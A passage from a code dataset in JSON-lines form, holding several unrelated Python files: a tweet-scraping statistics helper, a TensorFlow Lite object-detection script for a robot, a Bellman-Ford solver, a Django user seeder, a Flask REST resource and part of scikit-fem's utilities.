''):\n filename=hashtag.replace(' ','').replace(\"#\",\"\")\n os.system(\"python3 \"+path_script+\" --querysearch '\"+hashtag+\"'\"+\" --near \"+cercania+\" --lang es\")\n elif(hashtag == ''):\n if(usuario != ''):\n filename=usuario.replace(' ','').replace('@','')\n os.system(\"python3 \"+path_script+\" --username '\"+usuario.replace('@','')+\"'\"+\" --near \"+cercania+\" --lang es\")\n else:\n os.system(\"python3 \"+path_script+\" --since \"+str(f2)+\" --until \"+str(f1)+\" --near \"+cercania+\" --lang es\")\n return filename\n\ndef datosGrafica(filename='output_got'):\n archivo=''\n if('.csv' in filename):\n archivo=filename\n else:\n archivo=filename+'.csv'\n valoraciones=[]\n retweets=[]\n favoritos=[]\n hashtags=[]\n menciones=[]\n textos=[]\n with open(archivo,\"rt\") as csv_file:\n reader=csv.reader(csv_file, delimiter=';',skipinitialspace=True)\n for line in reader:\n try:\n valoraciones.append(line[10])\n retweets.append(int(line[2]))\n favoritos.append(int(line[3]))\n hashtags.append(line[7])\n menciones.append(line[6])\n textos.append(line[4])\n except:\n continue\n muy_positivo=0\n muy_negativo=0\n tendencia_n=0\n tendencia_p=0\n mayor_rt=max(retweets)\n promedio_rt= sum(retweets) / len(retweets)\n mayor_fv=max(favoritos)\n promedio_fv= sum(favoritos) / len(favoritos)\n texto_rt=textos[retweets.index(mayor_rt)]\n texto_fv=textos[favoritos.index(mayor_fv)]\n rt_positivos=[]\n rt_tend_pos=[]\n rt_tend_neg=[]\n rt_negativos=[]\n fv_positivos=[]\n fv_tend_pos=[]\n fv_tend_neg=[]\n fv_negativos=[]\n p=0\n for i in valoraciones:\n try:\n if(\"Muy positivo\" in i):\n muy_positivo=muy_positivo+1\n rt_positivos.append(retweets[p])\n fv_positivos.append(favoritos[p])\n elif(\"Muy negativo\" in i):\n muy_negativo=muy_negativo+1\n rt_negativos.append(retweets[p])\n fv_negativos.append(favoritos[p])\n elif(\"Tendencia positiva\" in i):\n tendencia_p=tendencia_p+1\n rt_tend_pos.append(retweets[p])\n fv_tend_pos.append(favoritos[p])\n elif(\"Tendencia negativa\" in i):\n tendencia_n=tendencia_n+1\n rt_tend_neg.append(retweets[p])\n fv_tend_neg.append(favoritos[p])\n except:\n continue\n p += 1\n hpopulares=[word for word, word_count in Counter(hashtags).most_common(4)]\n mpopulares=[word for word, word_count in Counter(menciones).most_common(4)]\n if not rt_positivos:\n rt_positivos.append(0)\n if not rt_negativos:\n rt_negativos.append(0)\n if not rt_tend_pos:\n rt_tend_pos.append(0)\n if not rt_tend_neg:\n rt_tend_neg.append(0)\n if not fv_positivos:\n fv_positivos.append(0)\n if not fv_negativos:\n fv_negativos.append(0)\n if not fv_tend_pos:\n fv_tend_pos.append(0)\n if not fv_tend_neg:\n fv_tend_neg.append(0)\n maxRtPos=max(rt_positivos)\n maxRtNeg=max(rt_negativos)\n maxRtTPos=max(rt_tend_pos)\n maxRtTNeg=max(rt_tend_neg)\n maxFvPos=max(fv_positivos)\n maxFvNeg=max(fv_negativos)\n maxFvTPos=max(fv_tend_pos)\n maxFvTNeg=max(fv_tend_neg)\n a={'Muy positivo':muy_positivo, 'Tendencia positiva':tendencia_p, 'Tendencia negativa':tendencia_n, 'Muy negativo':muy_negativo,\n 'Maximo RT Muy positivo': maxRtPos,'Maximo Rt Tendencia Positiva': maxRtTPos, 'Maximo Rt Tendencia Negativa':maxRtTNeg, \n 'Maximo Rt Muy negativos': maxRtNeg,'Tweet mas Rt':texto_rt, 'Promedio RT': float(promedio_rt), 'Mayor Favorito Muy Positivo':maxFvPos, \n 'Mayor Favorito Tendencia positiva': maxFvTPos, 'Mayor Favorito Tendencia Negativa': maxFvTNeg, 'Mayor Favorito Muy Negativo': maxFvNeg,\n 'Tweet mas Fv':texto_fv, 'Promedio Favorito':float(promedio_fv), 'Hashtags populares':hpopulares, 'Menciones 
populares':mpopulares}\n resultado=json.dumps(a)\n print(resultado)\n return resultado","sub_path":"GetOldTweets-python/pruebasistema.py","file_name":"pruebasistema.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"89564759","text":"from core.advbase import *\nfrom module.template import RngCritAdv\n\ndef module():\n return Mikoto\n\nclass Mikoto(RngCritAdv):\n conf = {}\n conf['slots.a'] = ['Resounding_Rendition', 'The_Fires_of_Hate']\n conf['slots.burn.a'] = ['Resounding_Rendition', 'Me_and_My_Bestie']\n conf['acl'] = \"\"\"\n `dragon, s=2 \n queue prep\n `s2;s4;s1\n end\n `s3, not buff(s3)\n `s4\n `s1, cancel\n `s2, x=5\n \"\"\"\n conf['coabs'] = ['Halloween_Mym', 'Dagger', 'Marth']\n conf['share'] = ['Kleimann']\n\n def prerun(self):\n self.config_rngcrit(cd=15, ev=20)\n self.a1_stack = 0\n\n def charge(self, name, sp, target=None):\n sp_s1 = self.sp_convert(self.sp_mod(name) + 0.1*self.a1_stack, sp)\n sp = self.sp_convert(self.sp_mod(name), sp)\n targets = self.get_targets(target)\n if not targets:\n return\n for s in targets:\n if s == self.s1:\n s.charge(sp_s1)\n else:\n s.charge(sp)\n self.think_pin('sp')\n log('sp', name if not target else f'{name}_{target}', sp, ', '.join([f'{s.charged}/{s.sp}' for s in self.skills]))\n\n def rngcrit_cb(self, mrate=None):\n self.a1_stack = mrate\n\n @property\n def buffcount(self):\n buffcount = super().buffcount\n return buffcount + self.a1_stack\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/mikoto.py","file_name":"mikoto.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"573352345","text":"def eh_crescente (lista):\n crescente = True\n i = 0\n c = 0\n while i+1 MIN_CONF_THRESH) and (scores[i] <= 1.0)):\n\n # Get bounding box coordinates and draw box\n # Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()\n ymin = int(max(1,(boxes[i][0] * imH)))\n xmin = int(max(1,(boxes[i][1] * imW)))\n ymax = int(min(imH,(boxes[i][2] * imH)))\n xmax = int(min(imW,(boxes[i][3] * imW)))\n\n # Draw label\n object_name = labels[int(classes[i])] # Look up object name from \"labels\" array using class index\n mapping[0] = sd.getBoolean(\"mapping\", False)\n # Example: 'person: 72%'\n if (mapping[0] == False):\n #Coordinate sending\n if (object_name == 'KitKat') :\n KitKatx = ((xmax + xmin) / 2) - 320\n KitKaty = 240 - ((ymax + ymin) / 2)\n KitKatall = KitKatall+[object_name]\n KitKatdist = int(math.sqrt(KitKatx**2+KitKaty**2))\n kitkatcord= kitkatcord+[[KitKatx,KitKaty, KitKatdist]]\n kkmin = min(kitkatcord,key = lambda x: x[2])\n kkx=kkmin[0]\n kky=kkmin[1]\n kkd=kkmin[2]\n sd.putNumber(\"KitKatx\",kkx)\n sd.putNumber(\"KitKaty\",kky)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), KitKatx, KitKaty)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'KitKat Coordinates : ' + str(kkmin[0:2]),(15,85),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 
255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n \n elif (object_name == 'Ball'):\n Ballx = ((xmax + xmin) / 2) - 320\n Bally = 240 - ((ymax + ymin) / 2)\n Ballall = Ballall+[object_name]\n Balldist = int(math.sqrt(Ballx**2+Bally**2))\n ballcord= ballcord+[[Ballx,Bally, Balldist]]\n bmin = min(ballcord,key = lambda x: x[2])\n bx=bmin[0]\n by=bmin[1]\n bd=bmin[2]\n sd.putNumber(\"Ballx\",bx )\n sd.putNumber(\"Bally\",by)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Ballx, Bally)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Ball Coordinates : ' + str(bmin[0:2]),(15,105),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n\n elif (object_name == 'Nissin'):\n Nissinx = ((xmax + xmin) / 2) - 320\n Nissiny = 240 - ((ymax + ymin) / 2)\n Nissinall = Nissinall+[object_name]\n Nissindist = int(math.sqrt(Nissinx**2+Nissiny**2))\n nissincord= nissincord+[[Nissinx,Nissiny,Nissindist]]\n nmin = min(nissincord,key = lambda x: x[2])\n nx=nmin[0]\n ny=nmin[1]\n nd=nmin[2]\n sd.putNumber(\"Nissinx\",nx )\n sd.putNumber(\"Nissiny\",ny )\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Nissinx, Nissiny)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Nissin Coordinates : ' + str(nmin[0:2]),(15,125),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n\n elif (object_name == 'Chips') :\n Chipsx = ((xmax + xmin) / 2) - 320\n Chipsy = 240 - ((ymax + ymin) / 2)\n Chipsall = Chipsall+[object_name]\n Chipsdist = int(math.sqrt(Chipsx**2+ Chipsy**2))\n chipcord= chipcord+[[Chipsx, Chipsy, Chipsdist]]\n cmin = min(chipcord,key = lambda x: x[2])\n cx=cmin[0]\n cy=cmin[1]\n cd=cmin[2]\n sd.putNumber(\"Chipsx\",cx )\n sd.putNumber(\"Chipsy\",cy)\n label = '%s: %d%% Coord:%d, %d' % (object_name, int(scores[i]*100), Chipsx, Chipsy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Chips Coordinates : ' + str(cmin[0:2]),(15,145),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),2,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, 
label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text\n \n current_count+=1\n\n\n elif (mapping[0] == True):\n \n if (object_name == 'GreenBox'):\n GreenBoxx = ((xmax + xmin) / 2) - 320\n GreenBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"GreenBoxx\", GreenBoxx)\n sd.putNumber(\"GreenBoxy\", GreenBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), GreenBoxx, GreenBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.putText(frame, 'GreenBox Coordinates : ' + str(GreenBoxx) + ',' + str(GreenBoxy),(15,165),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(GreenBoxx)+320,240-int(GreenBoxy)),(255,255,0),2)\n \n elif (object_name == 'YellowBox'):\n YellowBoxx = ((xmax + xmin) / 2) - 320\n YellowBoxy = 240 - ((ymax + ymin) / 2)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), YellowBoxx, YellowBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'YellowBox Coordinates : ' + str(YellowBoxx) + ',' + str(YellowBoxy),(15,185),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n sd.putNumber(\"YellowBoxx\", YellowBoxx)\n sd.putNumber(\"YellowBoxy\", YellowBoxy)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(YellowBoxx)+320,240-int(YellowBoxy)),(255,255,0),2)\n \n elif (object_name == 'RedBox'):\n RedBoxx = ((xmax + xmin) / 2) - 320\n RedBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"RedBoxx\", RedBoxx)\n sd.putNumber(\"RedBoxy\", RedBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), RedBoxx, RedBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'RedBox Coordinates : ' + str(RedBoxx) + ',' + str(RedBoxy),(15,205),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(RedBoxx)+320,240-int(RedBoxy)),(255,255,0),2)\n \n elif (object_name == 'BlackBox'):\n BlackBoxx = ((xmax + xmin) / 2) - 320\n BlackBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"BlackBoxx\", BlackBoxx)\n sd.putNumber(\"BlackBoxy\", BlackBoxy) \n label = '%s:%d%% 
x:%d,y:%d' % (object_name, int(scores[i]*100), BlackBoxx, BlackBoxy)\n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 2) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'BlackBox Coordinates : ' + str(BlackBoxx) + ',' + str(BlackBoxy),(15,225),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(BlackBoxx)+320,240-int(BlackBoxy)),(255,255,0),2)\n \n elif (object_name == 'BlueBox'):\n BlueBoxx = ((xmax + xmin) / 2) - 320\n BlueBoxy = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"BlueBoxx\", BlueBoxx)\n sd.putNumber(\"BlueBoxy\", BlueBoxy)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), BlueBoxx, BlueBoxy) \n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 1) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'BlueBox Coordinates : ' + str(BlueBoxx) + ',' + str(BlueBoxy),(15,245),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(BlueBoxx)+320,240-int(BlueBoxy)),(255,255,0),2)\n\n elif (object_name == 'Bin'):\n Binx = ((xmax + xmin) / 2) - 320\n Biny = 240 - ((ymax + ymin) / 2)\n sd.putNumber(\"Binx\", Binx)\n sd.putNumber(\"Biny\", Biny)\n label = '%s:%d%% x:%d,y:%d' % (object_name, int(scores[i]*100), Binx, Biny) \n labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.4, 1) # Get font size\n label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window\n cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)\n cv2.putText(frame, 'Bin Coordinates : ' + str(Binx) + ',' + str(Biny),(15,265),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,55),1,cv2.LINE_AA)\n cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in\n cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 0), 1) # Draw label text\n cv2.line(frame,(320,240),(int(Binx)+320,240-int(Biny)),(255,255,0),2)\n \n current_count+=1\n \n\n cv2.circle(frame,(320,240),5,(255,255,0),cv2.FILLED)\n cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(15,25),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,55),2,cv2.LINE_AA)\n cv2.putText (frame,'Total Detection Count : ' + str(current_count),(15,65),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,55),2,cv2.LINE_AA)\n \n\n # All the results have been drawn on the frame, so it's time to display it.\n cv2.imshow('Object Detector', frame)\n\n # Calculate framerate\n t2 = cv2.getTickCount()\n time1 = (t2-t1)/freq\n frame_rate_calc= 1/time1\n \n # Press 'q' to quit\n if cv2.waitKey(1) == ord('q'):\n break\n\n# Clean 
up\ncv2.destroyAllWindows()\nvideostream.stop()\nprint(\"Done\")\n\n\n","sub_path":"vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":24174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198570350","text":"\"\"\"\nBellmanFord\n\"\"\"\n\nINF = 10 ** 20\n\nv_num, e_num, r = map(int, input().split())\ndist_lst = [INF for _ in range(v_num)]\nedges_lst = [[] for _ in range(v_num)]\nnegative_cycle_flag = False\n\nfor _ in range(e_num):\n s, t, dist = map(int, input().split())\n edges_lst[s].append((dist, t))\n\ndist_lst[r] = 0\n\nif e_num != 0:\n for _ in range(v_num):\n for v in range(v_num):\n if dist_lst[v] != INF:\n for dist, to in edges_lst[v]:\n if dist_lst[v] + dist < dist_lst[to]:\n dist_lst[to] = dist_lst[v] + dist\n \n for v in range(v_num):\n if dist_lst[v] != INF:\n for dist, to in edges_lst[v]:\n if dist_lst[v] + dist < dist_lst[to]:\n negative_cycle_flag = True\n\nif negative_cycle_flag:\n print(\"NEGATIVE CYCLE\")\nelse:\n for dist in dist_lst:\n if dist == INF:\n print(\"INF\")\n else:\n print(dist)\n","sub_path":"GRL/GRL_1_B.py","file_name":"GRL_1_B.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"386271897","text":"import random\n\nfrom django.core.management.base import BaseCommand\nfrom django_seed import Seed\nfrom users.models import User\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--number\", default=1, type=int,\n help=\"How many users do you want to create??\")\n\n def handle(self, *args, **options):\n number = int(options.get(\"number\", 1))\n seeder = Seed.seeder()\n seeder.add_entity(User, number, {\n \"username\": lambda x: seeder.faker.name(),\n \"first_name\": lambda x: seeder.faker.first_name(),\n \"last_name\": lambda x: seeder.faker.last_name(),\n \"email\": lambda x: seeder.faker.email(),\n \"gender\": lambda x: random.choice(User.GENDER_CHOICES)[0],\n \"profile_img\": lambda x: f\"profile_img/test/tux{random.randint(1, 5)}.jpg\",\n \"bio\": lambda x: seeder.faker.paragraph(nb_sentences=3, variable_nb_sentences=True, ext_word_list=None),\n \"birthdate\": lambda x: seeder.faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=115),\n })\n\n all_users = User.objects.all()\n inserted_pk = seeder.execute()\n for pk in inserted_pk[User]:\n user = User.objects.get(pk=pk)\n for _ in range(random.randint(5, 10)):\n user.friends.add(random.choice(all_users))\n for _ in range(random.randint(1, 5)):\n user.friend_requests.add(random.choice(all_users))\n self.stdout.write(self.style.SUCCESS(f\"{number} user created!!!\"))\n","sub_path":"users/management/commands/seed_users.py","file_name":"seed_users.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"637843057","text":"import pandas as pd\nimport numpy as np\nimport os.path\n\n\n# Change printout width in console for better readability when printing data frame\ndef clean_window():\n desired_width = 320\n pd.set_option('display.width', desired_width)\n np.set_printoptions(linewidth=desired_width)\n pd.set_option('display.max_columns', 10)\n\n\n# Returns true if all 6 prediction models exist\ndef models_exist(file1, file2, file3, file4, file5, file6):\n files = file1, file2, file3, file4, file5, file6\n for file_num in files:\n if not os.path.exists(file_num):\n return 
False\n return True\n\n\n# Function used to circularize data\ndef date_cyc_enc(df, col, max_vals):\n df[col + '_sin'] = np.sin(2 * np.pi * df[col]/max_vals)\n df[col + '_cos'] = np.cos(2 * np.pi * df[col]/max_vals)\n return df\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474572125","text":"import os\nimport sys\nimport inspect\n\n# Get the current folder, which is the input folder\ncurrent_folder = os.path.realpath(\n os.path.abspath(\n os.path.split(\n inspect.getfile(\n inspect.currentframe()\n )\n )[0]\n )\n)\nfolder_parts = current_folder.split(os.sep)\nprevious_folder = os.sep.join(folder_parts[0:-2])\nsys.path.insert(0, current_folder)\nsys.path.insert(0, previous_folder)\n\nimport json\nfrom flask_restful import Resource,marshal_with, fields ,request, Api\nfrom flask_json import FlaskJSON, JsonError, json_response, as_json\n\n# pip install Flask-JSON\n\nresource_fields = {\n 'id_perfil_modulo':fields.Integer,\n 'id_perfil':fields.Integer,\n 'id_modulo':fields.Integer,\n 'enabled':fields.Integer,\n 'creado_por':fields.String,\n 'modificado_por':fields.String,\n}\n\nfrom stopwords.common import PerfilModuloItem\nfrom stopwords.bus import PerfilModuloBus\nfrom stopwords.bus import ErrorBus\n\nfrom .customException import CustomException\nfrom .support_jsonp import support_jsonp_custom\nfrom .support_jsonp import support_jsonp_ok\n\n\nperfilmodulo=PerfilModuloBus()\nitem=PerfilModuloItem()\nerror=ErrorBus()\n\nclass PerfilModuloList(Resource,CustomException):\n def get(self):\n try:\n data= perfilmodulo.getAll()\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def post(self):\n try:\n item.id_perfil=request.form['id_perfil']\n item.id_modulo=request.form['id_modulo']\n item.creado_por='test'\n if request.form['enabled'].upper() == 'TRUE':\n item.enabled=1\n else:\n item.enabled=0\n \n res=perfilmodulo.insert(item)\n message=error.getErrorMessage('','A0009',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message)\n except Exception as err:\n return self.showCustomException(err,request.args)\n\n\nclass PerfilModulo(Resource,CustomException):\n def get(self, id):\n try:\n data= perfilmodulo.getById(id)\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def delete(self, id):\n try:\n res=perfilmodulo.delete(id)\n message=error.getErrorMessage('','A0007',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message)\n except Exception as err:\n return self.showCustomException(err,request.args)\n def put(self,id):\n try:\n item.id_perfil_modulo=id\n item.id_perfil=request.form['id_perfil']\n item.id_modulo=request.form['id_modulo']\n item.modificado_por='test'\n res=perfilmodulo.update(item) \n message=error.getErrorMessage('','A0008',res)[0][\"ErrorMessage\"]\n return support_jsonp_ok(request.args,message) \n except Exception as err:\n return self.showCustomException(err,request.args)\n\nclass PerfilModuloByPerfil(Resource,CustomException):\n def get(self, id):\n try:\n data= perfilmodulo.getByIdPerfil(id)\n return support_jsonp_custom(data,resource_fields)\n except Exception as err:\n return 
self.showCustomException(err,request.args)","sub_path":"api/perfilModulo.py","file_name":"perfilModulo.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361585214","text":"\"\"\"This module contains utility functions such as convenient access to\nSciPy linear solvers.\"\"\"\n\nimport numpy as np\nimport scipy.sparse as sp\nimport scipy.sparse.linalg as spl\nimport scipy.sparse.csgraph as spg\nimport warnings\nfrom skfem.assembly import asm, bilinear_form, linear_form, Dofs\nfrom skfem.element import ElementVectorH1\nfrom typing import Optional, Union, Tuple, Callable\nfrom numpy import ndarray\nfrom scipy.sparse import spmatrix\nfrom skfem.assembly.global_basis import GlobalBasis\n\n\nLinearSolver = Callable[[spmatrix, ndarray], ndarray]\nEigenSolver = Callable[[spmatrix, spmatrix], Tuple[ndarray, ndarray]]\n# complex type for describing the return value of :func:`skfem.utils.condense`\nCondensedSystem = Union[spmatrix,\n Tuple[spmatrix, ndarray],\n Tuple[spmatrix, spmatrix],\n Tuple[spmatrix, ndarray, ndarray],\n Tuple[spmatrix, ndarray, ndarray, ndarray],\n Tuple[spmatrix, spmatrix, ndarray, ndarray]]\n\n\ndef condense(A: spmatrix,\n b: Optional[Union[ndarray, spmatrix]] = None,\n x: Optional[ndarray] = None,\n I: Optional[Union[ndarray, Dofs]] = None,\n D: Optional[Union[ndarray, Dofs]] = None,\n expand: bool = True) -> CondensedSystem:\n \"\"\"Eliminate DOF's from a linear system.\n\n Supports also generalized eigenvalue problems.\n\n Parameters\n ----------\n A\n The system matrix\n b\n The right hand side vector or the mass matrix for generalized\n eigenvalue problems.\n x\n The values of the condensed DOF's. If not given, assumed to be zero.\n I\n The set of DOF numbers to keep. If :class:`skfem.assembly.Dofs` object\n is given, then it's flattened via :meth:`skfem.assembly.Dofs.all`.\n D\n The set of DOF numbers to dismiss. If :class:`skfem.assembly.Dofs`\n object is given, then it's flattened via\n :meth:`skfem.assembly.Dofs.all`.\n expand\n If True, return x and I: :func:`skfem.utils.solve` will then expand the\n solution vector automatically. 
